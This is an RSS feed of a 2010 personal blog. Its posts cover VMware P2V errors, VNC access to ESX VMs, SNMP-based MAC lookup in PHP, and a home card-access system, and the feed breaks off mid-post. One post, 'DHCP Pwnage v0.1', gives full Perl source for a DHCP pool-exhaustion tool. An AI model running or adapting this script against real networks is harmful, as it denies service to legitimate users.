<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Mike&#039;s Realm</title>
	<atom:link href="http://michael.requeny.com/feed" rel="self" type="application/rss+xml" />
	<link>http://michael.requeny.com</link>
	<description>chown -R us ./base</description>
	<lastBuildDate>Wed, 25 Aug 2010 01:04:54 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=9587</generator>
		<item>
		<title>Linux P2V Issues</title>
		<link>http://michael.requeny.com/archives/346</link>
		<comments>http://michael.requeny.com/archives/346#comments</comments>
		<pubDate>Wed, 25 Aug 2010 00:14:52 +0000</pubDate>
		<dc:creator>Michael Requeny</dc:creator>
				<category><![CDATA[VMware]]></category>
		<category><![CDATA[esx]]></category>
		<category><![CDATA[esxi]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[p2v]]></category>
		<category><![CDATA[vmware]]></category>

		<guid isPermaLink="false">http://michael.requeny.com/?p=346</guid>
		<description><![CDATA[Took me awhile to get what should have been a simple Linux P2V done at work! This stuff wasn&#8217;t clearly stated anywhere&#8211;I couldn&#8217;t find anyone with similar issues, so I&#8217;m posting this up hoping to help someone else out in the future.  Working with VMware they pointed out the lack of support for dvSwitches after passing [...]]]></description>
			<content:encoded><![CDATA[<p>Took me awhile to get what should have been a simple Linux P2V done at work!</p>
<p>This stuff wasn&#8217;t clearly stated anywhere&#8211;I couldn&#8217;t find anyone with similar issues, so I&#8217;m posting this up hoping to help someone else out in the future.  Working with VMware they pointed out the lack of support for dvSwitches after passing through a few levels of support their.</p>
<h2>Error: Unable to connect to the Converter helper server on the target virtual machine</h2>
<p>Cause: VMware does not support the usage of dvSwitches for Linux Conversions!  Make sure the network you select isn&#8217;t a dvSwitch</p>
<h2>Error: Unable to obtain the IP address of the target virtual machine running the Converter helper server.</h2>
<p>Cause: Related to the above error, relying on DHCP while using a network that is a dvSwitch for a conversion will get you the above error.</p>
<h2>FAILED: MethodFault.summary</h2>
<p>The last task before removal will be something like: Connecting the Converter helper ISO image to the target virtual machine.</p>
<p>Cause: ESX(i) 4.1 is not supported at this time by VMware Converter&#8211;this was with version 4.0.1&#8211;the latest version at the time this post was made.</p>
<p>Leave a comment if these notes helped you out or if you have any other uncommon errors you ran into.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F346&amp;linkname=Linux%20P2V%20Issues" title="Delicious" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F346&amp;linkname=Linux%20P2V%20Issues" title="Digg" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F346&amp;linkname=Linux%20P2V%20Issues" title="Twitter" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F346&amp;linkname=Linux%20P2V%20Issues"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://michael.requeny.com/archives/346/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DHCP Pwnage v0.1</title>
		<link>http://michael.requeny.com/archives/335</link>
		<comments>http://michael.requeny.com/archives/335#comments</comments>
		<pubDate>Sun, 04 Jul 2010 00:39:09 +0000</pubDate>
		<dc:creator>Michael Requeny</dc:creator>
				<category><![CDATA[Uncatagorized]]></category>
		<category><![CDATA[dhcp]]></category>
		<category><![CDATA[l33t h4x]]></category>
		<category><![CDATA[perl]]></category>

		<guid isPermaLink="false">http://michael.requeny.com/?p=335</guid>
		<description><![CDATA[Ever wanted to exhaust a DHCP servers pool? I did, so I created DHCP Pwnage This Perl script will grab as many leases as you want, you define the number of leases via the $ClientC var. I plan on writing this tool in PHP so I can add a lot more functionality. This was created [...]]]></description>
			<content:encoded><![CDATA[<p>Ever wanted to exhaust a DHCP servers pool?<br />
I did, so I created DHCP Pwnage</p>
<p>This Perl script will grab as many leases as you want, you define the number of leases via the $ClientC var. I plan on writing this tool in PHP so I can add a lot more functionality.</p>
<p>This was created by modifying the example code of Net::DHCPClientLive, to get Net::DHCPClientLive you will need to force the install or notest the install via CPAN.  I have had no luck having Net::DHCPClientLive install properly on any platform without using force or notest.</p>
<p>Download: <a href="http://michael.requeny.com/wp-content/uploads/2010/07/dhcp-pwnage-v0.1.pl_.zip">dhcp-pwnage-v0.1.pl.zip</a></p>
<p><span id="more-335"></span></p>
<blockquote><p>#!/usr/bin/perl</p>
<p>##############################<br />
# DHCP PWNAGE v0.1           #<br />
# By: Michael Requeny        #<br />
# <a href="http://michael.requeny.com/">http://michael.requeny.com</a> #<br />
##############################</p>
<p>use Net::DHCPClientLive;<br />
no warnings;</p>
<p>#####################<br />
# Set the number of #<br />
# clients to spawn  #<br />
#####################<br />
$ClientC = 1;</p>
<p>$SIG{CHLD} = sub {while( waitpid(-1, WNOHANG) &gt; 0 ) {} };<br />
$SIG{INT} = sub { kill &#8216;KILL&#8217;, 0 };<br />
$SIG{QUIT} = sub { kill &#8216;KILL&#8217;, 0 };<br />
my $clt;<br />
my @liveClt = ();</p>
<p>for (my $k = 1; $k &lt;= $ClientC; $k++) {<br />
if ($clt = new Net::DHCPClientLive( interface =&gt; &#8220;eth0&#8243;, state =&gt; &#8216;BOUND&#8217;, verb =&gt; $verb)) {<br />
print &#8220;LOL CLIENT CREATED #$k: $clt-&gt;{cltmac}\n&#8221;;<br />
my $pid;<br />
if (pipe($R,$W) &amp;&amp; defined($pid = fork())) {<br />
if ($pid) {<br />
# keep the client<br />
close $W;<br />
$clt-&gt;{sock} = $R;<br />
push @liveClt, $clt;<br />
}<br />
else {<br />
# a client is created<br />
close $R;<br />
open(STDOUT, &#8220;&gt;&amp;$W&#8221;);<br />
select $W; $| = 1;<br />
}<br />
}<br />
}<br />
else{<br />
print &#8220;No.$k client failed to go to BOUND\n&#8221;;<br />
}<br />
}</p></blockquote>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F335&amp;linkname=DHCP%20Pwnage%20v0.1" title="Delicious" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F335&amp;linkname=DHCP%20Pwnage%20v0.1" title="Digg" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F335&amp;linkname=DHCP%20Pwnage%20v0.1" title="Twitter" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F335&amp;linkname=DHCP%20Pwnage%20v0.1"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://michael.requeny.com/archives/335/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Use VNC to manage VMware ESX/ESXi VMs</title>
		<link>http://michael.requeny.com/archives/333</link>
		<comments>http://michael.requeny.com/archives/333#comments</comments>
		<pubDate>Fri, 02 Jul 2010 21:54:51 +0000</pubDate>
		<dc:creator>Michael Requeny</dc:creator>
				<category><![CDATA[Uncatagorized]]></category>
		<category><![CDATA[esx]]></category>
		<category><![CDATA[esxi]]></category>
		<category><![CDATA[vmware]]></category>

		<guid isPermaLink="false">http://michael.requeny.com/?p=333</guid>
		<description><![CDATA[Something cool for your ESX/ESXi labs&#8211;Rather then relying on using the VIC (VMware Infrastructure Client) to remote control your VMs you can enable VNC access to them. To do this power off the VM and add the lines below to the VMs .vmx file, you will need to choose a different port for each VM [...]]]></description>
			<content:encoded><![CDATA[<p>Something cool for your ESX/ESXi labs&#8211;Rather then relying on using the VIC (VMware Infrastructure Client) to remote control your VMs you can enable VNC access to them.</p>
<p>To do this power off the VM and add the lines below to the VMs .vmx file, you will need to choose a different port for each VM you wish to do this on.</p>
<p>remotedisplay.vnc.port=”5900″</p>
<p>remotedisplay.vnc.enabled=”true”</p>
<p>If your using ESX you can password protect the VNC connection by adding this line:</p>
<p>remotedisplay.vnc.password = “password”</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F333&amp;linkname=Use%20VNC%20to%20manage%20VMware%20ESX%2FESXi%20VMs" title="Delicious" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F333&amp;linkname=Use%20VNC%20to%20manage%20VMware%20ESX%2FESXi%20VMs" title="Digg" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F333&amp;linkname=Use%20VNC%20to%20manage%20VMware%20ESX%2FESXi%20VMs" title="Twitter" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F333&amp;linkname=Use%20VNC%20to%20manage%20VMware%20ESX%2FESXi%20VMs"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://michael.requeny.com/archives/333/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Grab MAC Address from ARP Table with PHP</title>
		<link>http://michael.requeny.com/archives/328</link>
		<comments>http://michael.requeny.com/archives/328#comments</comments>
		<pubDate>Mon, 24 May 2010 01:17:34 +0000</pubDate>
		<dc:creator>Michael Requeny</dc:creator>
				<category><![CDATA[Uncatagorized]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[php]]></category>

		<guid isPermaLink="false">http://michael.requeny.com/?p=328</guid>
		<description><![CDATA[Cool function you can use on your local network to lookup a devices MAC address, (assuming the device is on your network). For a big company, either look in the remote locations router, or your core router.  If you use this leave me a comment, would love to know how your using it. // ============================================= [...]]]></description>
			<content:encoded><![CDATA[<div id="_mcePaste">Cool function you can use on your local network to lookup a devices MAC address, (assuming the device is on your network).</div>
<div>For a big company, either look in the remote locations router, or your core router.  If you use this leave me a comment, would love to know how your using it.</div>
<blockquote>
<div>// =============================================</div>
<div id="_mcePaste">// getmac(Device IP, Router, SNMP Read Community)</div>
<div>//  Michael Requeny &#8212; http://michael.requeny.com</div>
<div id="_mcePaste">// &#8211; Looks up remote devices MAC</div>
<div id="_mcePaste">// &#8211; SNMP to routers ARP table</div>
<div id="_mcePaste">// &#8211; Converts MAC from HEX to ASCII</div>
<div id="_mcePaste">// &#8211; Inserts : seperators</div>
<div id="_mcePaste">// =============================================</div>
<div id="_mcePaste">function getmac($ip, $router, $snmpread) {</div>
<div id="_mcePaste">$oid = &#8220;.1.3.6.1.2.1.3.1.1.2&#8243;;</div>
<div id="_mcePaste">$mac = snmprealwalk($router, $snmpread, $oid, 1000000 ,10);</div>
<div id="_mcePaste">// load up array keys for lookups</div>
<div id="_mcePaste">$keys = array_keys($mac);</div>
<div id="_mcePaste">foreach ($keys as $key) {</div>
<div id="_mcePaste">// if needle contains IP &amp;&amp; needle = IP</div>
<div id="_mcePaste">// this prevents srch for 10.254.254.1 returning</div>
<div id="_mcePaste">// multiple values (like .1, .11, .111, etc.</div>
<div id="_mcePaste">if (strstr($key,$ip) == $ip) {</div>
<div id="_mcePaste">$mackey = $key;</div>
<div id="_mcePaste">}</div>
<div id="_mcePaste">}</div>
<div id="_mcePaste">$mac = trim(str_replace(&#8216;Hex-STRING: &#8216;, &#8221;, $mac));</div>
<div id="_mcePaste">$mac = str_replace(&#8216; &#8216;, &#8216;:&#8217;, $mac);</div>
<div id="_mcePaste">return $mac;</div>
<div id="_mcePaste">}</div>
</blockquote>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F328&amp;linkname=Grab%20MAC%20Address%20from%20ARP%20Table%20with%20PHP" title="Delicious" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F328&amp;linkname=Grab%20MAC%20Address%20from%20ARP%20Table%20with%20PHP" title="Digg" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F328&amp;linkname=Grab%20MAC%20Address%20from%20ARP%20Table%20with%20PHP" title="Twitter" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F328&amp;linkname=Grab%20MAC%20Address%20from%20ARP%20Table%20with%20PHP"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://michael.requeny.com/archives/328/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Card Access Complete Write-up</title>
		<link>http://michael.requeny.com/archives/321</link>
		<comments>http://michael.requeny.com/archives/321#comments</comments>
		<pubDate>Mon, 22 Feb 2010 04:16:56 +0000</pubDate>
		<dc:creator>Michael Requeny</dc:creator>
				<category><![CDATA[Uncatagorized]]></category>
		<category><![CDATA[card access]]></category>
		<category><![CDATA[smarthome]]></category>

		<guid isPermaLink="false">http://michael.requeny.com/archives/321</guid>
		<description><![CDATA[So you want to setup a card access system?  Well assuming you don&#8217;t mind being locked out of your home for a few hours here is how it&#8217;s done&#8230; First let&#8217;s cover how they work— There are five parts to a card access system: Control Interface Cards Readers (Either card readers, keypads, or a combination [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-family: Times New Roman; font-size: 12pt;">So you want to setup a card access system?  Well <span style="text-decoration: line-through;">assuming you don&#8217;t mind being locked out of your home for a few hours</span> here is how it&#8217;s done&#8230;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">First let&#8217;s cover how they work—<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">There are five parts to a card access system:<br />
</span></p>
<ol>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Control Interface<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Cards<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Readers (Either card readers, keypads, or a combination of both)<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Card Access Control Panel(s)<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Outputs (electromagnetic locks, electric strikes, contacts)<span id="more-321"></span><br />
</span></li>
</ol>
<p><span style="font-family: Times New Roman; font-size: 12pt;">The C<strong>ontrol Interface</strong> lets you add/delete cards, delegate access, define time schedules, configure hardware, monitor events.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">The <strong>Cards</strong> identify the owner—there are very technologies these cards can be, MagStripe, Wiegand, 125kHz Prox and some other proprietary stuff.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">The <strong>Readers</strong> must be compatible with the type of card you choose—usually the readers only talk to one type of card.  The readers are &#8220;dumb&#8221; they have no information on any access privileges nor do they tell a lock to unlock (sorry to break your hearts Hollywood movie criminals)<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">The <strong>Card Access Control Panel</strong> receives data from readers, they are the only part of the system that have the information on access privileges, the panels energize relays to unlock doors.  When a panel receives information from a reader many things are checked—is the card known? Is the card within a valid date/time range for usage? Does it have access to whatever output is controlled by the reader sending it&#8217;s data?<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">The <strong>Outputs </strong>are whatever mechanism you are going to use to unlock your door.  There are a variety of things you can put on the outputs—I use a set of contacts on my garage door opener to open my garage.  I plan to use an electric strike plate on my front door at  a later date.  If I had a cabinet in my garage I wanted to secure I would use a small electromagnetic lock.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Know that you have an understanding of the system lets do the deep dive into how it all goes together.  This write up is vendor specific using mainly Northern Computers <img class="alignright" src="http://michael.requeny.com/wp-content/uploads/2010/02/022210_0416_CardAccessC1.png" alt="" width="190" height="142" align="right" />components but the basic principles of the system/wiring/etc. is the same no matter the manufacture you decide to use.  This information is things I&#8217;ve picked up just fooling around with this stuff, I&#8217;ve never implemented or designed a system other than my house and some friend&#8217;s homes so don&#8217;t try anything based on these instructions.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 24pt;"><strong>Card Access Panel<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">We will start with the core if the system which is your card access (CA) panel.  I prefer Northern  Computers (they are a part of Honeywell) panels because they are typically readily available on eBay, craigslist, etc.  I choose an N-1000-II&#8211;this panel supports 2 card readers and 4 relay outputs (and a bunch of contacts since you can use this panel as an alarm panel too but this guide won&#8217;t go into that&#8230;) So really just focusing on the fact that this panel can  provide card access to two different doors.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Power Supply</strong></span><span style="font-family: Times New Roman; font-size: 12pt;"><img class="alignright" src="http://michael.requeny.com/wp-content/uploads/2010/02/022210_0416_CardAccessC2.png" alt="" width="113" height="141" align="right" /></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">You need to power this CA panel, below are the power requirements</span></p>
<ul>
<li><span style="font-family: Times New Roman; font-size: 12pt;">The N-1000-II requires a 12 VAC, 40 VA, 60 HZ or 12 VDC linear (2 amp continuous) power supply.<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">The N-1000-III/IV requires a 16.5 VAC, 50 VA, 60 HZ or 12 VDC linear (2 amp continuous) power supply.<br />
</span></li>
</ul>
<p><a href="http://michael.requeny.com/wp-content/uploads/2008/09/battery-on-door.jpg" rel="lightbox[321]"><img class="alignright" style="border: 0pt none;" src="http://michael.requeny.com/wp-content/uploads/2010/02/022210_0416_CardAccessC3.jpg" border="0" alt="" width="151" height="152" align="right" /></a><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Battery Backup<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Many panels have batteries built into their cabinets to provide power to the panel in the event of power loss.  Think of it as a built in UPS for your CA panel.  If you bought the panel used off eBay spend the extra bucks and buy new batteries for it to ensure you can use your system in the event of power loss.  To maintain the maximum back-up time, you should replace the battery every 2-4 years&#8211;2 years if you are going to use the panel in high temperatures (like a garage in South Florida).  The picture to the right shows a battery mounted on a cabinet door for a CA panel.<br />
</span></p>
<ul>
<li><span style="font-family: Times New Roman; font-size: 12pt;">N-1000-II uses a 8 VDC (4 amp/hr.) battery that provides about three hours of full operational backup if the battery is in good shape.<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">N-1000-III/IV uses a 12 VDC (4 amp/hr.) battery that provides about four hours of full operational backup if the battery is in good shape.<br />
</span></li>
</ul>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Communication Bus<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Now that you have your panel picked out you need to figure out how to communicate with it, the N-1000-II has a number of methods, the comm bus is 20mA current loop. I used a Northern Computers C100A 20MA serial loop converter&#8211;It is a communication interface from your PC/Modem to N1000 panels.  This requires a power supply as well, a 12VAC power supply at that&#8211;the N-1000-II also needs 12VAC&#8211;Now if you can get a large enough power supply you will be able to wire both your CA panel into it and the serial converter.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Your other options are a Northern Computers network adapter that is basically a serial server as far as I know, priced at about $200 on eBay.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">If you purchase a N-1000-III or N-1000-IV you use the N-485-PCI-2 adapter, this is an RS485 to serial adapter for PC connections only.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">I used an off the shelf serial server attached to my C100A so I can program from the comfort of my desk.  This is recommended so you don&#8217;t have to take a laptop over to your panel to make changes (adding/removing keyfobs/cards)<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 24pt;"><strong>Outputs (Doors you want to control)<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">With all your panel stuff sorted out decide what do you want do you want to control access to with your panel&#8211;Garage Door, Exterior Door, Interior Door, Kitchen Cabinet?  These all basically are controlled the same way, just the lock mechanism is different depending on the door.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Garage Doors<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">The garage door is usually the easiest to do because 99% of openers simply connect two wires momentarily to operate the door.  We can wire this directly into the CA panel and leaving the garage door&#8217;s existing open/close button intact also having a card access to the garage door with no other parts.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Electric Strikes</strong></span><img class="alignright" src="http://michael.requeny.com/wp-content/uploads/2010/02/022210_0416_CardAccessC4.png" alt="" width="122" height="142" align="right" /></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Electric strikes replace the strike plate in the door frame.  There are two main types, Fail-Safe  and Fail-Secure.  Fail-Safe strikes usually require power 24/7 to keep them locked, when power is lost they unlock for safety.  Fail-Secure strikes stay locked until they are energized, and are what I would use.  Remember&#8211;the door handle still works, you can always exit in the event of an emergency by using the handle of the door as long as the lock is unlocked (I don&#8217;t think this is a problem in homes because you are exiting to the outside and you can unlock the door if it&#8217;s locked)<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Strikes are available in AC or DC power requirements, the AC units are the kind that buzz when you energize them so I wouldn&#8217;t recommend them for a home.  The DC units are silent except for maybe a click when they change state (energized/de-energized).  You may have heard this buzzing at convenience stores in shady parts of town&#8230;<br />
</span></p>
<p><img class="alignright" src="http://michael.requeny.com/wp-content/uploads/2010/02/022210_0416_CardAccessC5.png" alt="" width="140" height="143" align="right" /><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Electromagnetic Locks<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Many commercial buildings have interior doors that close during a fire alarm&#8211;these work with automatic door closer and a magnetic hold open device.  These magnetic locks are just much much stronger versions and instead of holding a door open they hold them locked.  There are many different sizes, smaller ones that you can use on a kitchen cabinet, display case, or file cabinet and larger ones for various size doors.  These require constant power to remain locked, when power is lost they will unlock unless you have battery backup in your power supply.</span><br />
<span style="font-family: Times New Roman; font-size: 12pt;"><br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 24pt;"><strong>Card Readers<br />
</strong></span></p>
<p><img class="alignright" src="http://michael.requeny.com/wp-content/uploads/2010/02/022210_0416_CardAccessC6.png" alt="" width="154" height="154" align="right" /><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Proximity Readers<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">These are the most popular now &#8216;adays many of you likely use these at work, and see the HID  logo on your badge and readers.  HID is the biggest manufacture of these readers and many other company&#8217;s simply rebrand HID readers and market them under their name.  There are like hundreds of designs and you typically need to use the same reader as the manufacture of the cards you want to use.  I use HID readers with: Duo-Prox cards, ProxProII cards, and Prox Keyfobs.  I feel these are the only kind of readers that should be used in the home due to the fact you can use a card or a keyfob. You can even use active transponders that you put in your car so your panel will open a gate or garage when the vehicle is close enough (these have like 20-30ft range) however that kind of install is outside of the scope of this guide so have fun with that&#8230;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Swipe Card Readers<br />
</strong></span></p>
<p><img class="alignright" src="http://michael.requeny.com/wp-content/uploads/2010/02/022210_0416_CardAccessC7.png" alt="" width="134" height="80" align="right" /><span style="font-family: Times New Roman; font-size: 12pt;">Security professionals will smite me for placing all these in one category but I feel they are all the same.  Swipe Card Readers use a variety different technologies, from Magstripe, Barcode, and some other stuff I know far to little to talk about.  These are prone to failure</span><br />
<span style="font-family: Times New Roman; font-size: 12pt;"> more easily in my opinion&#8211;everyone I know has demagnetized a hotel key card accidentally at least one time in their life&#8230; and Barcodes can scratch off or with regular wear be difficult to scan.  For these reasons I don&#8217;t recommend these types of readers.  However there is one more type of swipe reader called Wiegand.  Wiegand cards are very similar to mag-stripe except they have magnetic wires embedded into the card.  These make them much more durable than any other kind of swipe card.<br />
</span></p>
<p><img class="alignright" src="http://michael.requeny.com/wp-content/uploads/2010/02/022210_0416_CardAccessC8.png" alt="" width="141" height="162" align="right" /><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Keypads<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">You can forgo the card readers all together and simply use keypads.  These take more time and are less convenient then a card reader but they are good for a backup in case you lose your card.  Many keypads are available that are also card readers so you only need to moun</span><br />
<span style="font-family: Times New Roman; font-size: 12pt;">t a single unit to have both readers.  You can also program the panel to require both the keypad with correct code entry and having the user read a card to unlock a door to be really 007.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Biometrics<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Fingerprint, and Hand Geometry are the most popular, I haven&#8217;t seen anything like a iris or retina reader before.  I&#8217;ve seen software for voice analyzing but never a hardware solution that can be integrated into a access control system.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Key Readers<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">I don&#8217;t know much about them, I believe they are all using Dallas iButton (1-Wire technology oh ya!) readers/buttons.  These use a <span style="text-decoration: line-through;">button</span> key to be inserted into the reader momentarily.  Don&#8217;t worry about the elements, these keys/buttons are sealed, and are mounted on a flat plastic strip with a hole to go on your key ring.<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>SmartCard Readers<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">These are out of my price range so I haven&#8217;t toyed with it at all.  The readers I&#8217;ve seen are all contact less so don&#8217;t think about using that fedex kinkos card to open a door&#8211;yet&#8230;<br />
</span></p>
<p><span style="font-family: Times New Roman; font-size: 24pt;"><strong>Install<br />
</strong></span></p>
<p><span style="font-family: Times New Roman; font-size: 12pt;">Now that you have a grasp on all this you can proceed to install, there are a few things you need to be aware of with the install though:<br />
</span></p>
<ul>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Run all wiring for inductive loads (door locks/strikes) and panel primary power apart from each other&#8211;I ran the power supply for the panel in from the left side and all output wiring straight out the top.<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Use shielded cables or metal conduit on data cables to reduce interference.<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Do not mount the power supplies, modem, or external relays inside the N-1000-II enclosure.<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Do not &#8220;string&#8221; wire across the face of the N-1000-II panel.<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Do not use the same power supply for both locks and control panel or locks and readers.<br />
</span></li>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Do not mount the control panel in or near an area that has electric noise (e.g., next to a large electric motor or power transformer).<br />
</span></li>
</ul>
<p><span style="font-family: Times New Roman; font-size: 13pt;"><strong>Panel/Comm Interface<br />
</strong></span></p>
<ol>
<li><span style="font-family: Times New Roman; font-size: 12pt;">Mount the CA Panel Cabinet in a location close to an outlet that can be used 24/7 (not to be unplugged to charge your drill or something if you do this in the garage)<br />
</span></li>
